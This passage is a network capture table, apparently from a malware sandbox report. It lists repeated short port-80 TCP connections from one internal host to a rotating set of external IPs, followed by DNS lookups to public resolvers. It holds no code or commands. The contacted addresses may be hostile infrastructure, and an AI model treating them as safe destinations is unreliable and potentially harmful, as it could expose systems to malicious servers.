Dec 1, 2021 10:35:57.970314026 CET	80	49805	185.68.16.57	192.168.11.20
Dec 1, 2021 10:35:57.976423025 CET	80	49805	185.68.16.57	192.168.11.20
Dec 1, 2021 10:35:57.976475954 CET	80	49805	185.68.16.57	192.168.11.20
Dec 1, 2021 10:35:57.976511955 CET	80	49805	185.68.16.57	192.168.11.20
Dec 1, 2021 10:35:57.976766109 CET	49805	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:35:57.976814032 CET	49805	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:35:57.976826906 CET	49805	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:36:03.025546074 CET	49806	80	192.168.11.20	203.170.80.250
Dec 1, 2021 10:36:03.301140070 CET	80	49806	203.170.80.250	192.168.11.20
Dec 1, 2021 10:36:03.301496029 CET	49806	80	192.168.11.20	203.170.80.250
Dec 1, 2021 10:36:03.301599026 CET	49806	80	192.168.11.20	203.170.80.250
Dec 1, 2021 10:36:03.573339939 CET	80	49806	203.170.80.250	192.168.11.20
Dec 1, 2021 10:36:03.573409081 CET	80	49806	203.170.80.250	192.168.11.20
Dec 1, 2021 10:36:03.573750973 CET	49806	80	192.168.11.20	203.170.80.250
Dec 1, 2021 10:36:03.573867083 CET	49806	80	192.168.11.20	203.170.80.250
Dec 1, 2021 10:36:03.848649025 CET	80	49806	203.170.80.250	192.168.11.20
Dec 1, 2021 10:36:13.667717934 CET	49807	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:36:13.695892096 CET	80	49807	185.61.153.97	192.168.11.20
Dec 1, 2021 10:36:13.696171999 CET	49807	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:36:13.696224928 CET	49807	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:36:13.724998951 CET	80	49807	185.61.153.97	192.168.11.20
Dec 1, 2021 10:36:13.725049019 CET	80	49807	185.61.153.97	192.168.11.20
Dec 1, 2021 10:36:13.725377083 CET	49807	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:36:13.725425005 CET	49807	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:36:13.753624916 CET	80	49807	185.61.153.97	192.168.11.20
Dec 1, 2021 10:36:18.729079962 CET	49808	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:36:18.826689005 CET	80	49808	185.98.5.234	192.168.11.20
Dec 1, 2021 10:36:18.826920033 CET	49808	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:36:18.826982021 CET	49808	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:36:18.926768064 CET	80	49808	185.98.5.234	192.168.11.20
Dec 1, 2021 10:36:18.927215099 CET	80	49808	185.98.5.234	192.168.11.20
Dec 1, 2021 10:36:18.927263975 CET	80	49808	185.98.5.234	192.168.11.20
Dec 1, 2021 10:36:18.927540064 CET	49808	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:36:18.927588940 CET	49808	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:36:19.028799057 CET	80	49808	185.98.5.234	192.168.11.20
Dec 1, 2021 10:36:42.067820072 CET	49810	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:36:42.228260040 CET	80	49810	50.118.200.120	192.168.11.20
Dec 1, 2021 10:36:42.228481054 CET	49810	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:36:42.228549004 CET	49810	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:36:42.392623901 CET	80	49810	50.118.200.120	192.168.11.20
Dec 1, 2021 10:36:42.392694950 CET	80	49810	50.118.200.120	192.168.11.20
Dec 1, 2021 10:36:42.393157005 CET	49810	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:36:42.393271923 CET	49810	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:36:42.553657055 CET	80	49810	50.118.200.120	192.168.11.20
Dec 1, 2021 10:36:47.395014048 CET	49811	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:36:47.487751961 CET	80	49811	199.59.242.153	192.168.11.20
Dec 1, 2021 10:36:47.488107920 CET	49811	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:36:47.488163948 CET	49811	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:36:47.580930948 CET	80	49811	199.59.242.153	192.168.11.20
Dec 1, 2021 10:36:47.583441973 CET	80	49811	199.59.242.153	192.168.11.20
Dec 1, 2021 10:36:47.583498001 CET	80	49811	199.59.242.153	192.168.11.20
Dec 1, 2021 10:36:47.583534956 CET	80	49811	199.59.242.153	192.168.11.20
Dec 1, 2021 10:36:47.583879948 CET	49811	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:36:47.583928108 CET	49811	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:37:03.324304104 CET	49812	80	192.168.11.20	104.21.82.227
Dec 1, 2021 10:37:03.333317041 CET	80	49812	104.21.82.227	192.168.11.20
Dec 1, 2021 10:37:03.333475113 CET	49812	80	192.168.11.20	104.21.82.227
Dec 1, 2021 10:37:03.333529949 CET	49812	80	192.168.11.20	104.21.82.227
Dec 1, 2021 10:37:03.342570066 CET	80	49812	104.21.82.227	192.168.11.20
Dec 1, 2021 10:37:03.843971968 CET	49812	80	192.168.11.20	104.21.82.227
Dec 1, 2021 10:37:03.853319883 CET	80	49812	104.21.82.227	192.168.11.20
Dec 1, 2021 10:37:03.853662968 CET	49812	80	192.168.11.20	104.21.82.227
Dec 1, 2021 10:37:09.219089031 CET	49813	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:37:09.229960918 CET	80	49813	34.102.136.180	192.168.11.20
Dec 1, 2021 10:37:09.230185032 CET	49813	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:37:09.230278969 CET	49813	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:37:09.241166115 CET	80	49813	34.102.136.180	192.168.11.20
Dec 1, 2021 10:37:09.337218046 CET	80	49813	34.102.136.180	192.168.11.20
Dec 1, 2021 10:37:09.337281942 CET	80	49813	34.102.136.180	192.168.11.20
Dec 1, 2021 10:37:09.337632895 CET	49813	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:37:09.337730885 CET	49813	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:37:09.348651886 CET	80	49813	34.102.136.180	192.168.11.20
Dec 1, 2021 10:37:52.177331924 CET	49814	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:37:52.205708981 CET	80	49814	185.61.153.97	192.168.11.20
Dec 1, 2021 10:37:52.205867052 CET	49814	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:37:52.205991030 CET	49814	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:37:52.234708071 CET	80	49814	185.61.153.97	192.168.11.20
Dec 1, 2021 10:37:52.234757900 CET	80	49814	185.61.153.97	192.168.11.20
Dec 1, 2021 10:37:52.235027075 CET	49814	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:37:52.235076904 CET	49814	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:37:52.263375044 CET	80	49814	185.61.153.97	192.168.11.20
Dec 1, 2021 10:37:57.238600016 CET	49815	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:37:57.336982012 CET	80	49815	185.98.5.234	192.168.11.20
Dec 1, 2021 10:37:57.337651014 CET	49815	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:37:57.337733030 CET	49815	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:37:57.436475039 CET	80	49815	185.98.5.234	192.168.11.20
Dec 1, 2021 10:37:57.436963081 CET	80	49815	185.98.5.234	192.168.11.20
Dec 1, 2021 10:37:57.437022924 CET	80	49815	185.98.5.234	192.168.11.20
Dec 1, 2021 10:37:57.437618017 CET	49815	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:37:57.437714100 CET	49815	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:37:57.535039902 CET	80	49815	185.98.5.234	192.168.11.20
Dec 1, 2021 10:38:19.202689886 CET	49816	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:38:19.362117052 CET	80	49816	50.118.200.120	192.168.11.20
Dec 1, 2021 10:38:19.362369061 CET	49816	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:38:19.362488031 CET	49816	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:38:19.525703907 CET	80	49816	50.118.200.120	192.168.11.20
Dec 1, 2021 10:38:19.525757074 CET	80	49816	50.118.200.120	192.168.11.20
Dec 1, 2021 10:38:19.526094913 CET	49816	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:38:19.526148081 CET	49816	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:38:19.686077118 CET	80	49816	50.118.200.120	192.168.11.20
Dec 1, 2021 10:38:24.529443026 CET	49817	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:38:24.622092009 CET	80	49817	199.59.242.153	192.168.11.20
Dec 1, 2021 10:38:24.622354984 CET	49817	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:38:24.622596025 CET	49817	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:38:24.715154886 CET	80	49817	199.59.242.153	192.168.11.20
Dec 1, 2021 10:38:24.716063976 CET	80	49817	199.59.242.153	192.168.11.20
Dec 1, 2021 10:38:24.716120958 CET	80	49817	199.59.242.153	192.168.11.20
Dec 1, 2021 10:38:24.716157913 CET	80	49817	199.59.242.153	192.168.11.20
Dec 1, 2021 10:38:24.716440916 CET	49817	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:38:24.716495991 CET	49817	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:38:52.254894018 CET	49818	80	192.168.11.20	34.237.47.210
Dec 1, 2021 10:38:52.385905027 CET	80	49818	34.237.47.210	192.168.11.20
Dec 1, 2021 10:38:52.386357069 CET	49818	80	192.168.11.20	34.237.47.210
Dec 1, 2021 10:38:52.386452913 CET	49818	80	192.168.11.20	34.237.47.210
Dec 1, 2021 10:38:52.516807079 CET	80	49818	34.237.47.210	192.168.11.20
Dec 1, 2021 10:38:52.516884089 CET	80	49818	34.237.47.210	192.168.11.20
Dec 1, 2021 10:38:52.516933918 CET	80	49818	34.237.47.210	192.168.11.20
Dec 1, 2021 10:38:52.517287970 CET	49818	80	192.168.11.20	34.237.47.210
Dec 1, 2021 10:38:52.517389059 CET	49818	80	192.168.11.20	34.237.47.210
Dec 1, 2021 10:38:52.647763014 CET	80	49818	34.237.47.210	192.168.11.20
Dec 1, 2021 10:39:02.537446022 CET	49819	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:39:02.573975086 CET	80	49819	185.68.16.57	192.168.11.20
Dec 1, 2021 10:39:02.574158907 CET	49819	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:39:02.574249983 CET	49819	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:39:02.610482931 CET	80	49819	185.68.16.57	192.168.11.20
Dec 1, 2021 10:39:02.615684032 CET	80	49819	185.68.16.57	192.168.11.20
Dec 1, 2021 10:39:02.615739107 CET	80	49819	185.68.16.57	192.168.11.20
Dec 1, 2021 10:39:02.615777969 CET	80	49819	185.68.16.57	192.168.11.20
Dec 1, 2021 10:39:02.616236925 CET	49819	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:39:02.616272926 CET	49819	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:39:07.720077038 CET	49820	80	192.168.11.20	3.64.163.50
Dec 1, 2021 10:39:07.731512070 CET	80	49820	3.64.163.50	192.168.11.20
Dec 1, 2021 10:39:07.731777906 CET	49820	80	192.168.11.20	3.64.163.50
Dec 1, 2021 10:39:07.736438990 CET	49820	80	192.168.11.20	3.64.163.50
Dec 1, 2021 10:39:07.747410059 CET	80	49820	3.64.163.50	192.168.11.20
Dec 1, 2021 10:39:07.747466087 CET	80	49820	3.64.163.50	192.168.11.20
Dec 1, 2021 10:39:07.747500896 CET	80	49820	3.64.163.50	192.168.11.20
Dec 1, 2021 10:39:07.747802973 CET	49820	80	192.168.11.20	3.64.163.50
Dec 1, 2021 10:39:07.747862101 CET	49820	80	192.168.11.20	3.64.163.50
Dec 1, 2021 10:39:07.758892059 CET	80	49820	3.64.163.50	192.168.11.20
Dec 1, 2021 10:39:17.799101114 CET	49821	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:39:17.808018923 CET	80	49821	34.102.136.180	192.168.11.20
Dec 1, 2021 10:39:17.808223963 CET	49821	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:39:17.808342934 CET	49821	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:39:17.817095995 CET	80	49821	34.102.136.180	192.168.11.20
Dec 1, 2021 10:39:17.915040016 CET	80	49821	34.102.136.180	192.168.11.20
Dec 1, 2021 10:39:17.915087938 CET	80	49821	34.102.136.180	192.168.11.20
Dec 1, 2021 10:39:17.915419102 CET	49821	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:39:17.915468931 CET	49821	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:39:17.926345110 CET	80	49821	34.102.136.180	192.168.11.20
Dec 1, 2021 10:39:22.923888922 CET	49822	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:39:22.932878971 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:22.933183908 CET	49822	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:39:22.938014030 CET	49822	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:39:22.946660042 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:23.234057903 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:23.234146118 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:23.234213114 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:23.234257936 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:23.234600067 CET	49822	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:39:23.234711885 CET	49822	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:39:23.248006105 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:23.248079062 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:23.248126030 CET	80	49822	35.244.144.199	192.168.11.20
Dec 1, 2021 10:39:23.248404980 CET	49822	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:39:23.248476028 CET	49822	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:39:23.248492956 CET	49822	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:39:28.453775883 CET	49823	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:39:28.636806965 CET	80	49823	44.227.76.166	192.168.11.20
Dec 1, 2021 10:39:28.637193918 CET	49823	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:39:28.818970919 CET	80	49823	44.227.76.166	192.168.11.20
Dec 1, 2021 10:39:28.819186926 CET	49823	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:39:29.000880957 CET	80	49823	44.227.76.166	192.168.11.20
Dec 1, 2021 10:39:29.003925085 CET	80	49823	44.227.76.166	192.168.11.20
Dec 1, 2021 10:39:29.003998995 CET	80	49823	44.227.76.166	192.168.11.20
Dec 1, 2021 10:39:29.004477978 CET	49823	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:39:29.004582882 CET	49823	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:39:29.186041117 CET	80	49823	44.227.76.166	192.168.11.20
Dec 1, 2021 10:39:34.015011072 CET	49824	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:39:34.043262959 CET	80	49824	185.61.153.97	192.168.11.20
Dec 1, 2021 10:39:34.043528080 CET	49824	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:39:34.043601990 CET	49824	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:39:34.072640896 CET	80	49824	185.61.153.97	192.168.11.20
Dec 1, 2021 10:39:34.072690964 CET	80	49824	185.61.153.97	192.168.11.20
Dec 1, 2021 10:39:34.072956085 CET	49824	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:39:34.073004007 CET	49824	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:39:34.101272106 CET	80	49824	185.61.153.97	192.168.11.20
Dec 1, 2021 10:39:39.075730085 CET	49825	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:39:39.177131891 CET	80	49825	185.98.5.234	192.168.11.20
Dec 1, 2021 10:39:39.177424908 CET	49825	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:39:39.177602053 CET	49825	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:39:39.278839111 CET	80	49825	185.98.5.234	192.168.11.20
Dec 1, 2021 10:39:39.279314041 CET	80	49825	185.98.5.234	192.168.11.20
Dec 1, 2021 10:39:39.279377937 CET	80	49825	185.98.5.234	192.168.11.20
Dec 1, 2021 10:39:39.279611111 CET	49825	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:39:39.279673100 CET	49825	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:39:39.380516052 CET	80	49825	185.98.5.234	192.168.11.20
Dec 1, 2021 10:39:56.481267929 CET	49826	80	192.168.11.20	66.29.140.185
Dec 1, 2021 10:39:56.640918016 CET	80	49826	66.29.140.185	192.168.11.20
Dec 1, 2021 10:39:56.641115904 CET	49826	80	192.168.11.20	66.29.140.185
Dec 1, 2021 10:39:56.641159058 CET	49826	80	192.168.11.20	66.29.140.185
Dec 1, 2021 10:39:56.800844908 CET	80	49826	66.29.140.185	192.168.11.20
Dec 1, 2021 10:39:56.898849010 CET	80	49826	66.29.140.185	192.168.11.20
Dec 1, 2021 10:39:56.898904085 CET	80	49826	66.29.140.185	192.168.11.20
Dec 1, 2021 10:39:56.899058104 CET	49826	80	192.168.11.20	66.29.140.185
Dec 1, 2021 10:39:58.649298906 CET	49826	80	192.168.11.20	66.29.140.185
Dec 1, 2021 10:39:58.808984995 CET	80	49826	66.29.140.185	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 10:32:46.873445988 CET	58905	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:32:46.897624016 CET	53	58905	9.9.9.9	192.168.11.20
Dec 1, 2021 10:33:52.592293024 CET	53396	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:33:52.766258001 CET	53	53396	9.9.9.9	192.168.11.20
Dec 1, 2021 10:33:58.463874102 CET	62083	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:33:58.486392975 CET	53	62083	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:03.571842909 CET	59090	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:03.764271975 CET	53	59090	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:08.774692059 CET	54433	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:08.959342957 CET	53	54433	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:14.085139036 CET	57927	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:14.298508883 CET	53	57927	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:19.849370956 CET	65316	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:20.152492046 CET	53	65316	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:25.473534107 CET	57410	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:25.488063097 CET	53	57410	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:30.768971920 CET	57343	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:31.783941031 CET	57343	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:34:31.884144068 CET	53	57343	1.1.1.1	192.168.11.20
Dec 1, 2021 10:34:33.989433050 CET	53	57343	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:36.961976051 CET	61982	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:34:36.975837946 CET	53	61982	1.1.1.1	192.168.11.20
Dec 1, 2021 10:34:42.047966003 CET	65080	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:34:42.357877970 CET	53	65080	1.1.1.1	192.168.11.20
Dec 1, 2021 10:34:48.562439919 CET	61313	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:34:49.576936960 CET	61313	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:50.118654966 CET	53	61313	1.1.1.1	192.168.11.20
Dec 1, 2021 10:34:50.118932962 CET	61313	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:51.612142086 CET	53	61313	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:51.841981888 CET	53	61313	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:56.622905016 CET	49801	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:34:56.989509106 CET	53	49801	9.9.9.9	192.168.11.20
Dec 1, 2021 10:34:56.989995956 CET	49801	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:34:57.143985033 CET	53	49801	1.1.1.1	192.168.11.20
Dec 1, 2021 10:35:07.167642117 CET	61714	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:35:07.338968039 CET	53	61714	9.9.9.9	192.168.11.20
Dec 1, 2021 10:35:12.665761948 CET	52526	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:35:12.786721945 CET	53	52526	9.9.9.9	192.168.11.20
Dec 1, 2021 10:35:17.977154016 CET	64791	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:35:17.986330032 CET	53	64791	9.9.9.9	192.168.11.20
Dec 1, 2021 10:35:31.271440983 CET	57056	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:35:31.285382032 CET	53	57056	9.9.9.9	192.168.11.20
Dec 1, 2021 10:35:41.378674030 CET	51383	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:35:41.601293087 CET	53	51383	9.9.9.9	192.168.11.20
Dec 1, 2021 10:35:46.612178087 CET	58295	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:35:46.633599043 CET	53	58295	9.9.9.9	192.168.11.20
Dec 1, 2021 10:35:51.985929012 CET	59218	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:35:52.133974075 CET	53	59218	9.9.9.9	192.168.11.20
Dec 1, 2021 10:35:57.452815056 CET	63834	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:35:57.901051998 CET	53	63834	9.9.9.9	192.168.11.20
Dec 1, 2021 10:36:02.982851028 CET	65259	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:36:03.024566889 CET	53	65259	9.9.9.9	192.168.11.20
Dec 1, 2021 10:36:08.575474024 CET	64693	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:36:08.651695967 CET	53	64693	9.9.9.9	192.168.11.20
Dec 1, 2021 10:36:23.931282043 CET	54459	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:36:24.946508884 CET	54459	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:36:25.961668968 CET	54459	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:36:26.120920897 CET	53	54459	9.9.9.9	192.168.11.20
Dec 1, 2021 10:36:26.121256113 CET	54459	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:36:26.345874071 CET	53	54459	1.1.1.1	192.168.11.20
Dec 1, 2021 10:36:26.345932007 CET	53	54459	1.1.1.1	192.168.11.20
Dec 1, 2021 10:36:27.644097090 CET	53	54459	9.9.9.9	192.168.11.20
Dec 1, 2021 10:36:31.351963997 CET	63381	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:36:31.417742014 CET	53	63381	9.9.9.9	192.168.11.20
Dec 1, 2021 10:36:31.418046951 CET	63381	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:36:32.048674107 CET	53	63381	1.1.1.1	192.168.11.20
Dec 1, 2021 10:36:52.597315073 CET	54904	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:36:52.609491110 CET	53	54904	9.9.9.9	192.168.11.20
Dec 1, 2021 10:37:03.281949043 CET	59407	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:03.323291063 CET	53	59407	9.9.9.9	192.168.11.20
Dec 1, 2021 10:37:08.859380007 CET	53101	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:09.077161074 CET	53101	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:37:09.218341112 CET	53	53101	9.9.9.9	192.168.11.20
Dec 1, 2021 10:37:09.237143993 CET	53	53101	1.1.1.1	192.168.11.20
Dec 1, 2021 10:37:14.342346907 CET	55723	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:14.367193937 CET	53	55723	9.9.9.9	192.168.11.20
Dec 1, 2021 10:37:19.372097969 CET	53483	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:19.391932964 CET	53	53483	9.9.9.9	192.168.11.20
Dec 1, 2021 10:37:24.402618885 CET	60878	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:24.620625973 CET	60878	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:37:25.635932922 CET	60878	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:27.651160002 CET	60878	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:37:27.651196003 CET	60878	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:28.091406107 CET	53	60878	1.1.1.1	192.168.11.20
Dec 1, 2021 10:37:28.091453075 CET	53	60878	1.1.1.1	192.168.11.20
Dec 1, 2021 10:37:28.091867924 CET	60878	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:37.118721962 CET	54993	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:37.122581005 CET	53	54993	9.9.9.9	192.168.11.20
Dec 1, 2021 10:37:42.133161068 CET	55255	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:42.141109943 CET	53	55255	9.9.9.9	192.168.11.20
Dec 1, 2021 10:37:47.147453070 CET	62667	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:37:47.165062904 CET	53	62667	9.9.9.9	192.168.11.20
Dec 1, 2021 10:38:02.441134930 CET	58546	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:38:02.659101963 CET	58546	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:38:03.674535036 CET	58546	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:38:03.745449066 CET	53	58546	9.9.9.9	192.168.11.20
Dec 1, 2021 10:38:03.745764017 CET	58546	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:38:03.936310053 CET	53	58546	9.9.9.9	192.168.11.20
Dec 1, 2021 10:38:03.936738968 CET	58546	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:38:04.044579983 CET	53	58546	1.1.1.1	192.168.11.20
Dec 1, 2021 10:38:04.044644117 CET	53	58546	1.1.1.1	192.168.11.20
Dec 1, 2021 10:38:04.044686079 CET	53	58546	1.1.1.1	192.168.11.20
Dec 1, 2021 10:38:09.049036980 CET	58665	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:38:09.069571018 CET	53	58665	9.9.9.9	192.168.11.20
Dec 1, 2021 10:38:09.069972038 CET	58665	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:38:09.186266899 CET	53	58665	1.1.1.1	192.168.11.20
Dec 1, 2021 10:38:29.731554031 CET	51174	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:38:29.735654116 CET	53	51174	9.9.9.9	192.168.11.20
Dec 1, 2021 10:38:52.179902077 CET	57340	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:38:52.254117966 CET	53	57340	9.9.9.9	192.168.11.20
Dec 1, 2021 10:38:57.522468090 CET	54391	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:38:57.526416063 CET	53	54391	9.9.9.9	192.168.11.20
Dec 1, 2021 10:39:07.629553080 CET	60281	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:39:07.719265938 CET	53	60281	9.9.9.9	192.168.11.20
Dec 1, 2021 10:39:12.753325939 CET	52988	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:39:12.757158995 CET	53	52988	9.9.9.9	192.168.11.20
Dec 1, 2021 10:39:17.767942905 CET	51696	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:39:17.798168898 CET	53	51696	9.9.9.9	192.168.11.20
Dec 1, 2021 10:39:28.250144005 CET	52661	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:39:28.452843904 CET	53	52661	9.9.9.9	192.168.11.20
Dec 1, 2021 10:39:44.293937922 CET	53260	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:39:44.511593103 CET	53260	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:39:44.623514891 CET	53	53260	9.9.9.9	192.168.11.20
Dec 1, 2021 10:39:44.623796940 CET	53260	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:39:46.222630978 CET	53	53260	1.1.1.1	192.168.11.20
Dec 1, 2021 10:39:46.222697020 CET	53	53260	1.1.1.1	192.168.11.20
Dec 1, 2021 10:39:51.229561090 CET	49224	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:39:51.255513906 CET	53	49224	9.9.9.9	192.168.11.20
Dec 1, 2021 10:39:51.255830050 CET	49224	53	192.168.11.20	1.1.1.1
Dec 1, 2021 10:39:51.406645060 CET	53	49224	1.1.1.1	192.168.11.20
Dec 1, 2021 10:39:56.416148901 CET	54487	53	192.168.11.20	9.9.9.9
Dec 1, 2021 10:39:56.480251074 CET	53	54487	9.9.9.9	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
